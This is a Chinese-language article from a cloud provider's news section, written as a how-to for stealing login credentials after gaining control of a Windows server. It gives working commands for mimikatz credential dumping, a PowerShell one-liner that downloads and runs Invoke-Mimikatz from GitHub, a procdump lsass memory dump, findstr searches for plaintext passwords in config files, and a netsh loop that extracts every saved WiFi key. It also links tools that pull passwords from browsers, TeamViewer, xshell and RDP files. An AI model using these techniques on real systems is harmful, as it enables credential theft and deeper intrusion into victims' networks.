溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Windows下登錄憑證竊取技巧是什么

發(fā)布時(shí)間:2021-12-31 15:55:23 來(lái)源:億速云 閱讀:429 作者:柒染 欄目:系統(tǒng)運(yùn)維

Windows下登錄憑證竊取技巧是什么,很多新手對(duì)此不是很清楚,為了幫助大家解決這個(gè)難題,下面小編將為大家詳細(xì)講解,有這方面需求的人可以來(lái)學(xué)習(xí)下,希望你能有所收獲。

拿到一臺(tái)Windows服務(wù)器權(quán)限,收集各種登錄憑證以便擴(kuò)大戰(zhàn)果。下面分享幾個(gè)竊取Windows登錄憑證的工具和技巧。

1、Windows 本地密碼Hash

Windows的系統(tǒng)密碼hash默認(rèn)情況下一般由兩部分組成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系統(tǒng)下hash密碼格式用戶名稱:RID:LM-HASH值:NT-HASH值。

例如:

Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040  用戶名稱為:Administrator  RID為:500  LM-HASH值為:AF01DF70036EBACFAAD3B435B51404EE  NT-HASH值為:44F077E27F6FEF69E7BD834C7242B040

破解方式一:hash在線破解網(wǎng)站

https://www.objectif-securite.ch/ophcrack  http://cmd5.com

Windows下登錄憑證竊取技巧是什么

破解方式二:mimikatz

Github地址:

https://github.com/gentilkiwi/mimikatz

mimikatz使用起來(lái)也非常簡(jiǎn)單,提取Windows系統(tǒng)的明文密碼只需兩行命令:

privilege::debug  sekurlsa::logonpasswords

Windows下登錄憑證竊取技巧是什么

破解方式三:wce

wce的常用參數(shù)使用說(shuō)明如下:  參數(shù)解釋:      -l     列出登錄的會(huì)話和NTLM憑據(jù)(默認(rèn)值)      -s     修改當(dāng)前登錄會(huì)話的NTLM憑據(jù) 參數(shù):<用戶名>:<域名>:<LM哈希>:<NT哈希>      -w     通過(guò)摘要式認(rèn)證緩存一個(gè)明文的密碼

Windows下登錄憑證竊取技巧是什么

破解方式四:Powershell+mimikatz

直接利用poweshell來(lái)調(diào)用mimikatz抓取系統(tǒng)內(nèi)的明文密碼。

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

破解方式五:prodump+mimikatz

procdump是微軟官方提供的一個(gè)小工具,微軟官方下載地址:

https://technet.microsoft.com/en-us/sysinternals/dd996900
# 將工具拷貝到目標(biāo)機(jī)器上執(zhí)行如下命令(需要管理員權(quán)限,我選擇的版本是64位)  procdump.exe -accepteula -ma lsass.exe lsass.dmp  # 將生成的內(nèi)存dump文件拷貝到mimikatz同目錄下,雙擊打開(kāi)mimikatz執(zhí)行情況如圖:  mimikatz # sekurlsa::minidump lsass.dmp # Switch to MINIDUMP  mimikatz # sekurlsa::logonPasswords full

2、抓取瀏覽器密碼

很多瀏覽器都提供了記住密碼的功能,用戶在登錄一些網(wǎng)站的時(shí)候會(huì)選擇記住密碼。

LaZagne:提取瀏覽器所保存的密碼

github項(xiàng)目地址:

https://github.com/AlessandroZ/LaZagne

Windows下登錄憑證竊取技巧是什么

3、服務(wù)端明文存儲(chǔ)密碼

在一些配置文件或日志里,明文記錄著敏感的密碼信息,如web.config、config.ini等文件,可通過(guò)手動(dòng)翻查敏感目錄,也可以通過(guò)findstr命令來(lái)查找敏感文件和內(nèi)容。

findstr /i /s "password" *.config  findstr /i /s "password" *.ini  findstr /i /s "password" *.xml

4、第三方運(yùn)維工具托管密碼解密

常見(jiàn)的有Linux運(yùn)維工具,如Putty、xshell、winscp等,RDP管理工具,Remote Desktop Organizer,遠(yuǎn)控軟件:Teamviewer等。

xshell 密碼解密工具:

https://github.com/dzxs/Xdecrypt

提取WinSCP,PuTTY等保存的會(huì)話信息:

https://github.com/Arvanaghi/SessionGopher

從內(nèi)存中提取TeamViewer密碼的工具:

https://github.com/attackercan/teamviewer-dumper

一鍵破解客戶端星號(hào)密碼--星號(hào)密碼查看器。

Windows下登錄憑證竊取技巧是什么

5、一鍵獲取電腦wifi密碼

#查看電腦連接過(guò)的所有wifi  netsh wlan show profiles  #查看wifi信號(hào)為Aaron的密碼  netsh wlan show profiles name="Aaron" key=clear  #CMD一鍵獲取 所有連接過(guò)的WIFI密碼  for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

6、Windows鍵盤(pán)記錄工具

可以記錄用戶鍵盤(pán)操作,從而捕獲用戶的敏感信息,在github和T00ls都可以找到這一類的源碼和工具。

7、Windows密碼提取工具合集

各種Windows程序的密碼提取工具,包括各種瀏覽器、郵箱、Windows網(wǎng)絡(luò)密碼、無(wú)線網(wǎng)絡(luò)密鑰等。

IE瀏覽器提取密碼工具:

https://www.nirsoft.net/toolsdownload/iepv.zip

Firefox 瀏覽器密碼提取工具:

https://www.nirsoft.net/toolsdownload/passwordfox-x64.zip

Chrome 瀏覽器密碼提取工具:

https://www.nirsoft.net/toolsdownload/chromepass.zip

SVN密碼解密器:

http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd_source.zip

郵箱密碼提取工具:

https://www.nirsoft.net/toolsdownload/mailpv.zip

提取.rdp文件中存儲(chǔ)的密碼:

https://www.nirsoft.net/toolsdownload/rdpv.zip

MSSQL憑據(jù)密碼獲取工具:

http://www.zcgonvh.com/zb_users/upload/2015/2/mssql_credentials_pwd.zip

看完上述內(nèi)容是否對(duì)您有幫助呢?如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章,請(qǐng)關(guān)注億速云行業(yè)資訊頻道,感謝您對(duì)億速云的支持。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI